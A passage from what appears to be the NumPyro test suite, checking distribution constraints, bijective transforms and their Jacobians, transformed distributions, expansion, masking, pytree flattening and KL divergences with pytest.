(constraints.boolean, np.array([1, 1]), np.array([True, True])),
(constraints.boolean, np.array([-1, 1]), np.array([False, True])),
(
constraints.corr_cholesky,
np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),
np.array([True, False]),
), # NB: not lower_triangular
(
constraints.corr_cholesky,
np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),
np.array([False, False]),
), # NB: not positive_diagonal & not unit_norm_row
(
constraints.corr_matrix,
np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),
np.array([True, False]),
), # NB: not lower_triangular
(
constraints.corr_matrix,
np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),
np.array([False, False]),
), # NB: not unit diagonal
(constraints.greater_than(1), 3, True),
(
constraints.greater_than(1),
np.array([-1, 1, 5]),
np.array([False, False, True]),
),
(constraints.integer_interval(-3, 5), 0, True),
(
constraints.integer_interval(-3, 5),
np.array([-5, -3, 0, 1.1, 5, 7]),
np.array([False, True, True, False, True, False]),
),
(constraints.interval(-3, 5), 0, True),
(
constraints.interval(-3, 5),
np.array([-5, -3, 0, 5, 7]),
np.array([False, True, True, True, False]),
),
(constraints.less_than(1), -2, True),
(
constraints.less_than(1),
np.array([-1, 1, 5]),
np.array([True, False, False]),
),
(constraints.lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True),
(
constraints.lower_cholesky,
np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),
np.array([False, False]),
),
(constraints.nonnegative_integer, 3, True),
(
constraints.nonnegative_integer,
np.array([-1.0, 0.0, 5.0]),
np.array([False, True, True]),
),
(constraints.positive, 3, True),
(constraints.positive, np.array([-1, 0, 5]), np.array([False, False, True])),
(constraints.positive_definite, np.array([[1.0, 0.3], [0.3, 1.0]]), True),
(
constraints.positive_definite,
np.array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]),
np.array([False, False]),
),
(constraints.positive_integer, 3, True),
(
constraints.positive_integer,
np.array([-1.0, 0.0, 5.0]),
np.array([False, False, True]),
),
(constraints.real, -1, True),
(
constraints.real,
np.array([np.inf, -np.inf, np.nan, np.pi]),
np.array([False, False, False, True]),
),
(constraints.simplex, np.array([0.1, 0.3, 0.6]), True),
(
constraints.simplex,
np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),
np.array([True, False, False]),
),
(constraints.softplus_positive, 3, True),
(
constraints.softplus_positive,
np.array([-1, 0, 5]),
np.array([False, False, True]),
),
(
constraints.softplus_lower_cholesky,
np.array([[1.0, 0.0], [-2.0, 0.1]]),
True,
),
(
constraints.softplus_lower_cholesky,
np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),
np.array([False, False]),
),
(constraints.unit_interval, 0.1, True),
(
constraints.unit_interval,
np.array([-5, 0, 0.5, 1, 7]),
np.array([False, True, True, True, False]),
),
(
constraints.sphere,
np.array([[1, 0, 0], [0.5, 0.5, 0]]),
np.array([True, False]),
),
(
constraints.open_interval(0.0, 1.0),
np.array([-5, 0, 0.5, 1, 7]),
np.array([False, False, True, False, False]),
),
],
)
def test_constraints(constraint, x, expected):
v = constraint.feasible_like(x)
if jnp.result_type(v) == "float32" or jnp.result_type(v) == "float64":
assert not constraint.is_discrete
assert_array_equal(constraint(x), expected)
feasible_value = constraint.feasible_like(x)
assert jnp.shape(feasible_value) == jnp.shape(x)
assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected), True))
try:
inverse = biject_to(constraint).inv(feasible_value)
except NotImplementedError:
pass
else:
assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-7)
@pytest.mark.parametrize(
"constraint",
[
constraints.corr_cholesky,
constraints.corr_matrix,
constraints.greater_than(2),
constraints.interval(-3, 5),
constraints.l1_ball,
constraints.less_than(1),
constraints.lower_cholesky,
constraints.scaled_unit_lower_cholesky,
constraints.ordered_vector,
constraints.positive,
constraints.positive_definite,
constraints.positive_ordered_vector,
constraints.real,
constraints.real_vector,
constraints.simplex,
constraints.softplus_positive,
constraints.softplus_lower_cholesky,
constraints.unit_interval,
constraints.open_interval(0.0, 1.0),
],
ids=lambda x: x.__class__,
)
@pytest.mark.parametrize("shape", [(), (1,), (3,), (6,), (3, 1), (1, 3), (5, 3)])
def test_biject_to(constraint, shape):
transform = biject_to(constraint)
event_dim = transform.domain.event_dim
if isinstance(constraint, constraints._Interval):
assert transform.codomain.upper_bound == constraint.upper_bound
assert transform.codomain.lower_bound == constraint.lower_bound
elif isinstance(constraint, constraints._GreaterThan):
assert transform.codomain.lower_bound == constraint.lower_bound
elif isinstance(constraint, constraints._LessThan):
assert transform.codomain.upper_bound == constraint.upper_bound
if len(shape) < event_dim:
return
rng_key = random.PRNGKey(0)
x = random.normal(rng_key, shape)
y = transform(x)
assert transform.forward_shape(x.shape) == y.shape
assert transform.inverse_shape(y.shape) == x.shape
    # test that inv works for NaN arrays:
x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))
assert x_nan.shape == x.shape
# test codomain
batch_shape = shape if event_dim == 0 else shape[:-1]
assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=jnp.bool_))
# test inv
z = transform.inv(y)
assert_allclose(x, z, atol=1e-5, rtol=1e-5)
    # test domain; currently everything is constraints.real or constraints.real_vector
assert_array_equal(transform.domain(z), jnp.ones(batch_shape))
# test log_abs_det_jacobian
actual = transform.log_abs_det_jacobian(x, y)
assert jnp.shape(actual) == batch_shape
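    # When the input has exactly event_dim dimensions, check the analytic log|det J| against
    # the slogdet of an autodiff Jacobian, restricted to the free coordinates for constrained
    # outputs (e.g. dropping the last simplex coordinate or vectorizing triangular matrices).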
if len(shape) == event_dim:
if constraint is constraints.simplex:
expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)[:, :-1])[1]
elif constraint in [
constraints.real_vector,
constraints.ordered_vector,
constraints.positive_ordered_vector,
constraints.l1_ball,
]:
expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]
elif constraint in [constraints.corr_cholesky, constraints.corr_matrix]:
vec_transform = lambda x: matrix_to_tril_vec( # noqa: E731
transform(x), diagonal=-1
)
y_tril = matrix_to_tril_vec(y, diagonal=-1)
def inv_vec_transform(y):
matrix = vec_to_tril_matrix(y, diagonal=-1)
if constraint is constraints.corr_matrix:
# fill the upper triangular part
matrix = (
matrix
+ jnp.swapaxes(matrix, -2, -1)
+ jnp.identity(matrix.shape[-1])
)
return transform.inv(matrix)
expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]
elif constraint in [
constraints.lower_cholesky,
constraints.scaled_unit_lower_cholesky,
constraints.positive_definite,
constraints.softplus_lower_cholesky,
]:
vec_transform = lambda x: matrix_to_tril_vec(transform(x)) # noqa: E731
y_tril = matrix_to_tril_vec(y)
def inv_vec_transform(y):
matrix = vec_to_tril_matrix(y)
if constraint is constraints.positive_definite:
# fill the upper triangular part
matrix = (
matrix
+ jnp.swapaxes(matrix, -2, -1)
- jnp.diag(jnp.diag(matrix))
)
return transform.inv(matrix)
expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]
else:
expected = jnp.log(jnp.abs(grad(transform)(x)))
inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))
assert_allclose(actual, expected, atol=1e-5, rtol=1e-5)
assert_allclose(actual, -inv_expected, atol=1e-5, rtol=1e-5)
# NB: skip transforms which are tested in `test_biject_to`
@pytest.mark.parametrize(
"transform, event_shape",
[
(PermuteTransform(np.array([3, 0, 4, 1, 2])), (5,)),
(PowerTransform(2.0), ()),
(SoftplusTransform(), ()),
(
LowerCholeskyAffine(
np.array([1.0, 2.0]), np.array([[0.6, 0.0], [1.5, 0.4]])
),
(2,),
),
(
transforms.ComposeTransform(
[
biject_to(constraints.simplex),
SimplexToOrderedTransform(0.0),
biject_to(constraints.ordered_vector).inv,
]
),
(5,),
),
],
)
@pytest.mark.parametrize(
"batch_shape",
[
(),
(1,),
(3,),
(6,),
(3, 1),
(1, 3),
(5, 3),
],
)
def test_bijective_transforms(transform, event_shape, batch_shape):
shape = batch_shape + event_shape
rng_key = random.PRNGKey(0)
x = biject_to(transform.domain)(random.normal(rng_key, shape))
y = transform(x)
# test codomain
assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))
# test inv
z = transform.inv(y)
assert_allclose(x, z, atol=1e-6, rtol=1e-4)
assert transform.inv.inv is transform
assert transform.inv is transform.inv
assert transform.domain is transform.inv.codomain
assert transform.codomain is transform.inv.domain
# test domain
assert_array_equal(transform.domain(z), jnp.ones(batch_shape))
# test log_abs_det_jacobian
actual = transform.log_abs_det_jacobian(x, y)
assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))
assert jnp.shape(actual) == batch_shape
if len(shape) == transform.domain.event_dim:
if len(event_shape) == 1:
expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]
else:
expected = jnp.log(jnp.abs(grad(transform)(x)))
inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))
assert_allclose(actual, expected, atol=1e-6)
assert_allclose(actual, -inv_expected, atol=1e-6)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_composed_transform(batch_shape):
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
t = transforms.ComposeTransform([t1, t2, t1])
assert t.domain.event_dim == 1
assert t.codomain.event_dim == 2
x = np.random.normal(size=batch_shape + (6,))
y = t(x)
log_det = t.log_abs_det_jacobian(x, y)
assert log_det.shape == batch_shape
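    # The first AffineTransform scales all 6 input coordinates by 2 (contributing 6 * log(2));
    # the final AffineTransform scales every entry of the resulting 3 x 3 lower-triangular
    # matrix by 2 (contributing 9 * log(2)); the LowerCholeskyTransform term is evaluated at
    # its intermediate input x * 2 and output y / 2.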
expected_log_det = (
jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2) + jnp.log(2) * 9
)
assert_allclose(log_det, expected_log_det)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_composed_transform_1(batch_shape):
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
t = transforms.ComposeTransform([t1, t2, t2])
assert t.domain.event_dim == 1
assert t.codomain.event_dim == 3
x = np.random.normal(size=batch_shape + (6,))
y = t(x)
log_det = t.log_abs_det_jacobian(x, y)
assert log_det.shape == batch_shape
z = t2(x * 2)
expected_log_det = (
jnp.log(2) * 6
+ t2.log_abs_det_jacobian(x * 2, z)
+ t2.log_abs_det_jacobian(z, t2(z)).sum(-1)
)
assert_allclose(log_det, expected_log_det)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_simplex_to_order_transform(batch_shape):
simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()
simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)
transform = SimplexToOrderedTransform()
out = transform(simplex)
assert out.shape == transform.forward_shape(simplex.shape)
assert simplex.shape == transform.inverse_shape(out.shape)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
@pytest.mark.parametrize("prepend_event_shape", [(), (4,)])
@pytest.mark.parametrize("sample_shape", [(), (7,)])
def test_transformed_distribution(batch_shape, prepend_event_shape, sample_shape):
base_dist = (
dist.Normal(0, 1)
.expand(batch_shape + prepend_event_shape + (6,))
.to_event(1 + len(prepend_event_shape))
)
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
d = dist.TransformedDistribution(base_dist, [t1, t2, t1])
assert d.event_dim == 2 + len(prepend_event_shape)
y = d.sample(random.PRNGKey(0), sample_shape)
t = transforms.ComposeTransform([t1, t2, t1])
x = t.inv(y)
assert x.shape == sample_shape + base_dist.shape()
log_prob = d.log_prob(y)
assert log_prob.shape == sample_shape + batch_shape
t_log_det = t.log_abs_det_jacobian(x, y)
if prepend_event_shape:
t_log_det = t_log_det.sum(-1)
expected_log_prob = base_dist.log_prob(x) - t_log_det
assert_allclose(log_prob, expected_log_prob, atol=1e-5)
@pytest.mark.parametrize(
"transformed_dist",
[
dist.TransformedDistribution(
dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()
),
dist.TransformedDistribution(
dist.Exponential(jnp.ones(2)),
[
transforms.PowerTransform(0.7),
transforms.AffineTransform(0.0, jnp.ones(2) * 3),
],
),
],
)
def test_transformed_distribution_intermediates(transformed_dist):
sample, intermediates = transformed_dist.sample_with_intermediates(
random.PRNGKey(1)
)
assert_allclose(
transformed_dist.log_prob(sample, intermediates),
transformed_dist.log_prob(sample),
)
def test_transformed_transformed_distribution():
loc, scale = -2, 3
dist1 = dist.TransformedDistribution(
dist.Normal(2, 3), transforms.PowerTransform(2.0)
)
dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(-2, 3))
assert isinstance(dist2.base_dist, dist.Normal)
assert len(dist2.transforms) == 2
assert isinstance(dist2.transforms[0], transforms.PowerTransform)
assert isinstance(dist2.transforms[1], transforms.AffineTransform)
rng_key = random.PRNGKey(0)
assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))
intermediates = dist2.sample_with_intermediates(rng_key)
assert len(intermediates) == 2
def _make_iaf(input_dim, hidden_dims, rng_key):
arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])
_, init_params = arn_init(rng_key, (input_dim,))
return InverseAutoregressiveTransform(partial(arn, init_params))
@pytest.mark.parametrize(
"ts",
[
[transforms.PowerTransform(0.7), transforms.AffineTransform(2.0, 3.0)],
[transforms.ExpTransform()],
[
transforms.ComposeTransform(
[transforms.AffineTransform(-2, 3), transforms.ExpTransform()]
),
transforms.PowerTransform(3.0),
],
[
_make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(0)),
transforms.PermuteTransform(jnp.arange(5)[::-1]),
_make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(1)),
],
],
)
def test_compose_transform_with_intermediates(ts):
transform = transforms.ComposeTransform(ts)
x = random.normal(random.PRNGKey(2), (7, 5))
y, intermediates = transform.call_with_intermediates(x)
logdet = transform.log_abs_det_jacobian(x, y, intermediates)
assert_allclose(y, transform(x))
assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))
@pytest.mark.parametrize("x_dim, y_dim", [(3, 3), (3, 4)])
def test_unpack_transform(x_dim, y_dim):
xy = np.random.randn(x_dim + y_dim)
unpack_fn = lambda xy: {"x": xy[:x_dim], "y": xy[x_dim:]} # noqa: E731
transform = transforms.UnpackTransform(unpack_fn)
z = transform(xy)
if x_dim == y_dim:
with pytest.warns(UserWarning, match="UnpackTransform.inv"):
t = transform.inv(z)
else:
t = transform.inv(z)
assert_allclose(t, xy)
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS)
def test_generated_sample_distribution(
jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)
):
"""On samplers that we do not get directly from JAX, (e.g. we only get
Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test
agreement in the empirical distribution of generated samples between our
samplers and those from SciPy.
"""
if jax_dist not in [dist.Gumbel]:
pytest.skip(
"{} sampling method taken from upstream, no need to"
"test generated samples.".format(jax_dist.__name__)
)
jax_dist = jax_dist(*params)
if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:
our_samples = jax_dist.sample(key, (N_sample,))
ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)
assert ks_result.pvalue > 0.05
@pytest.mark.parametrize(
"jax_dist, params, support",
[
(dist.BernoulliLogits, (5.0,), jnp.arange(2)),
(dist.BernoulliProbs, (0.5,), jnp.arange(2)),
(dist.BinomialLogits, (4.5, 10), jnp.arange(11)),
(dist.BinomialProbs, (0.5, 11), jnp.arange(12)),
(dist.BetaBinomial, (2.0, 0.5, 12), jnp.arange(13)),
(dist.CategoricalLogits, (np.array([3.0, 4.0, 5.0]),), jnp.arange(3)),
(dist.CategoricalProbs, (np.array([0.1, 0.5, 0.4]),), jnp.arange(3)),
],
)
@pytest.mark.parametrize("batch_shape", [(5,), ()])
@pytest.mark.parametrize("expand", [False, True])
def test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand):
p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))
actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)
expected = support.reshape((-1,) + (1,) * len(batch_shape))
if expand:
expected = jnp.broadcast_to(expected, support.shape + batch_shape)
assert_allclose(actual, expected)
def test_zero_inflated_enumerate_support():
base_dist = dist.Bernoulli(0.5)
d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)
assert d.has_enumerate_support
assert_allclose(d.enumerate_support(), base_dist.enumerate_support())
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DISCRETE)
@pytest.mark.parametrize("prepend_shape", [(), (2, 3)])
@pytest.mark.parametrize("sample_shape", [(), (4,)])
def test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):
jax_dist = jax_dist(*params)
new_batch_shape = prepend_shape + jax_dist.batch_shape
expanded_dist = jax_dist.expand(new_batch_shape)
rng_key = random.PRNGKey(0)
samples = expanded_dist.sample(rng_key, sample_shape)
assert expanded_dist.batch_shape == new_batch_shape
assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape
assert expanded_dist.log_prob(samples).shape == sample_shape + new_batch_shape
# test expand of expand
assert (
expanded_dist.expand((3,) + new_batch_shape).batch_shape
== (3,) + new_batch_shape
)
# test expand error
if prepend_shape:
with pytest.raises(ValueError, match="Cannot broadcast distribution of shape"):
assert expanded_dist.expand((3,) + jax_dist.batch_shape)
@pytest.mark.parametrize("base_shape", [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1, 5)])
@pytest.mark.parametrize("event_dim", [0, 1, 2, 3])
@pytest.mark.parametrize("sample_shape", [(1000,), (1000, 7, 1), (1000, 1, 7)])
def test_expand_shuffle_regression(base_shape, event_dim, sample_shape):
expand_shape = (2, 3, 5)
event_dim = min(event_dim, len(base_shape))
loc = random.normal(random.PRNGKey(0), base_shape) * 10
base_dist = dist.Normal(loc, 0.1).to_event(event_dim)
expanded_dist = base_dist.expand(expand_shape[: len(expand_shape) - event_dim])
samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)
expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.shape())
assert_allclose(samples.mean(0), expected_mean, atol=0.1)
@pytest.mark.parametrize("batch_shape", [(), (4,), (10, 3)])
def test_sine_bivariate_von_mises_batch_shape(batch_shape):
phi_loc = jnp.broadcast_to(jnp.array(0.0), batch_shape)
psi_loc = jnp.array(0.0)
phi_conc = jnp.array(1.0)
psi_conc = jnp.array(1.0)
corr = jnp.array(0.1)
sine = SineBivariateVonMises(phi_loc, psi_loc, phi_conc, psi_conc, corr)
assert sine.batch_shape == batch_shape
samples = sine.sample(random.PRNGKey(0))
assert samples.shape == (*batch_shape, 2)
def test_sine_bivariate_von_mises_sample_mean():
loc = jnp.array([[2.0, -1.0], [-2, 1.0]])
sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)
samples = sine.sample(random.PRNGKey(0), (5000,))
assert_allclose(_circ_mean(samples).T, loc, rtol=5e-3)
@pytest.mark.parametrize("batch_shape", [(), (4,)])
def test_polya_gamma(batch_shape, num_points=20000):
d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)
rng_key = random.PRNGKey(0)
# test density approximately normalized
x = jnp.linspace(1.0e-6, d.truncation_point, num_points)
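    # Riemann-sum approximation of the integral of the density over (0, truncation_point];
    # it should be close to 1 if the density is properly normalized.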
prob = (d.truncation_point / num_points) * jnp.exp(
logsumexp(d.log_prob(x), axis=-1)
)
assert_allclose(prob, jnp.ones(batch_shape), rtol=1.0e-4)
# test mean of approximate sampler
z = d.sample(rng_key, sample_shape=(3000,))
mean = jnp.mean(z, axis=-1)
assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)
@pytest.mark.parametrize(
"extra_event_dims,expand_shape",
[(0, (4, 3, 2, 1)), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))],
)
def test_expand_reshaped_distribution(extra_event_dims, expand_shape):
loc = jnp.zeros((1, 6))
scale_tril = jnp.eye(6)
d = dist.MultivariateNormal(loc, scale_tril=scale_tril)
full_shape = (4, 1, 1, 1, 6)
reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)
cut = 4 - extra_event_dims
batch_shape, event_shape = full_shape[:cut], full_shape[cut:]
assert reshaped_dist.batch_shape == batch_shape
assert reshaped_dist.event_shape == event_shape
large = reshaped_dist.expand(expand_shape)
assert large.batch_shape == expand_shape
assert large.event_shape == event_shape
# Throws error when batch shape cannot be broadcasted
with pytest.raises((RuntimeError, ValueError)):
reshaped_dist.expand(expand_shape + (3,))
# Throws error when trying to shrink existing batch shape
with pytest.raises((RuntimeError, ValueError)):
large.expand(expand_shape[1:])
@pytest.mark.parametrize(
"batch_shape, mask_shape",
[((), ()), ((2,), ()), ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))],
)
@pytest.mark.parametrize("event_shape", [(), (3,)])
def test_mask(batch_shape, event_shape, mask_shape):
jax_dist = (
dist.Normal().expand(batch_shape + event_shape).to_event(len(event_shape))
)
mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)
if mask_shape == ():
mask = bool(mask)
samples = jax_dist.sample(random.PRNGKey(1))
actual = jax_dist.mask(mask).log_prob(samples)
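    # Where the mask is False the log-probability is set to zero, so the nonzero entries of
    # `actual` should line up with the broadcasted mask (barring the unlikely case of an
    # unmasked log-probability being exactly zero).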
assert_allclose(
actual != 0,
jnp.broadcast_to(mask, lax.broadcast_shapes(batch_shape, mask_shape)),
)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 4)])
def test_mask_grad(event_shape):
def f(x, data):
base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()
mask = jnp.all(
jnp.isfinite(data), tuple(-i - 1 for i in range(len(event_shape)))
)
log_prob = base_dist.mask(mask).log_prob(data)
assert log_prob.shape == data.shape[: len(data.shape) - len(event_shape)]
return log_prob.sum()
data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])
log_prob, grad = jax.value_and_grad(f)(1.0, data)
assert jnp.isfinite(grad) and jnp.isfinite(log_prob)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_dist_pytree(jax_dist, sp_dist, params):
def f(x):
return jax_dist(*params)
if jax_dist is _ImproperWrapper:
pytest.skip("Cannot flattening ImproperUniform")
if jax_dist is dist.EulerMaruyama:
pytest.skip("EulerMaruyama doesn't define flatten/unflatten")
    jax.jit(f)(0)  # this tests flatten/unflatten
    lax.map(f, np.ones(3))  # this tests compatibility w.r.t. scan
# Test that parameters do not change after flattening.
expected_dist = f(0)
actual_dist = jax.jit(f)(0)
expected_sample = expected_dist.sample(random.PRNGKey(0))
actual_sample = actual_dist.sample(random.PRNGKey(0))
expected_log_prob = expected_dist.log_prob(expected_sample)
actual_log_prob = actual_dist.log_prob(actual_sample)
assert_allclose(actual_sample, expected_sample, rtol=1e-6)
assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-6)
@pytest.mark.parametrize(
"method, arg", [("to_event", 1), ("mask", False), ("expand", [5])]
)
def test_special_dist_pytree(method, arg):
def f(x):
d = dist.Normal(np.zeros(1), np.ones(1))
return getattr(d, method)(arg)
jax.jit(f)(0)
lax.map(f, np.ones(3))
def test_expand_no_unnecessary_batch_shape_expansion():
# ExpandedDistribution can mutate the `batch_shape` of
# its base distribution in order to make ExpandedDistribution
# mappable, see #684. However, this mutation should not take
# place if no mapping operation is performed.
for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):
# Low level test: ensure that (tree_flatten o tree_unflatten)(expanded_dist)
# amounts to an identity operation.
d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])
roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])
assert d.batch_shape == roundtripped_d.batch_shape
assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape
assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape
assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)
assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)
# High-level test: `jax.jit`ting a function returning an ExpandedDistribution
# (which involves an instance of the low-level case as it will transform
# the original function by adding some flattening and unflattening steps)
# should return same object as its non-jitted equivalent.
def bs(arg):
return dist.Normal(arg, arg).expand([10, 3, *arg.shape])
d = bs(arg)
dj = jax.jit(bs)(arg)
assert isinstance(d, dist.ExpandedDistribution)
assert isinstance(dj, dist.ExpandedDistribution)
assert d.batch_shape == dj.batch_shape
assert d.base_dist.batch_shape == dj.base_dist.batch_shape
assert d.base_dist.event_shape == dj.base_dist.event_shape
assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)
assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_delta_normal_shape(batch_shape):
v = np.random.normal(size=batch_shape)
loc = np.random.normal(size=batch_shape)
scale = np.exp(np.random.normal(size=batch_shape))
p = dist.Delta(v)
q = dist.Normal(loc, scale)
assert kl_divergence(p, q).shape == batch_shape
def test_kl_delta_normal():
v = np.random.normal()
loc = np.random.normal()
scale = np.exp(np.random.normal())
p = dist.Delta(v, 10.0)
q = dist.Normal(loc, scale)
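    # For p = Delta(v) with log_density = 10, KL(p || q) = E_p[log p - log q] = 10 - q.log_prob(v).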
assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_independent_normal(batch_shape, event_shape):
shape = batch_shape + event_shape
p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))
q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))
actual = kl_divergence(
dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))
)
expected = sum_rightmost(kl_divergence(p, q), len(event_shape))
assert_allclose(actual, expected)
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_expanded_normal(batch_shape, event_shape):
shape = batch_shape + event_shape
p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)
q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)
actual = kl_divergence(
dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))
)
expected = sum_rightmost(kl_divergence(p, q), len(event_shape))
assert_allclose(actual, expected)
@pytest.mark.parametrize("shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize(
"p_dist, q_dist",
[
(dist.Beta, dist.Beta),
(dist.Gamma, dist.Gamma),
(dist.Kumaraswamy, dist.Beta),
(dist.Normal, dist.Normal),
(dist.Weibull, dist.Gamma),
],
)
def test_kl_univariate(shape, p_dist, q_dist):
def make_dist(dist_class):
params = {}
for k, c in dist_class.arg_constraints.items():
if c is constraints.real:
params[k] = np.random.normal(size=shape)
elif c is constraints.positive:
params[k] = np.exp(np.random.normal(size=shape))
else:
raise ValueError(f"Missing pattern for param {k}.")
d = dist_class(**params)
if dist_class is dist.Kumaraswamy:
d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000
return d
p = make_dist(p_dist)
q = make_dist(q_dist)
actual = kl_divergence(p, q)
x = p.sample(random.PRNGKey(0), (10000,)).copy()
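    # Monte Carlo check: KL(p || q) = E_p[log p(x) - log q(x)], estimated from 10000 samples.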
expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize("shape", [(4,), (2, 3)], ids=str)
def test_kl_dirichlet_dirichlet(shape):
p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))
q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))
actual = kl_divergence(p, q)
x = p.sample(random.PRNGKey(0), (10_000,)).copy()
expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)
assert_allclose(actual, expected, rtol=0.05)
def test_vmapped_binomial_p0():
# test that vmapped binomial with p = 0 does not have an infinite loop
def sample_binomial_withp0(key):
n = 2 * (random.uniform(key) > 0.5)
_, key = random.split(key)
return dist.Binomial(total_count=n, probs=0).sample(key)
jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))
def _get_vmappable_dist_init_params(jax_dist):
    if jax_dist.__name__ == "_TruncatedCauchy":
        return [2, 3]
    elif jax_dist.__name__ == "_TruncatedNormal":
        return [2, 3]
elif issubclass(jax_dist, dist.Distribution):
init_parameters = list(inspect.signature(jax_dist.__init__).parameters.keys())[
1:
]
vmap_over_parameters = list(
inspect.signature(vmap_over.dispatch(jax_dist)).parameters.keys()
)[1:]
        return [
            i
            for i, name in enumerate(init_parameters)
            if name in vmap_over_parameters
        ]
else:
raise ValueError
def _allclose_or_equal(a1, a2):
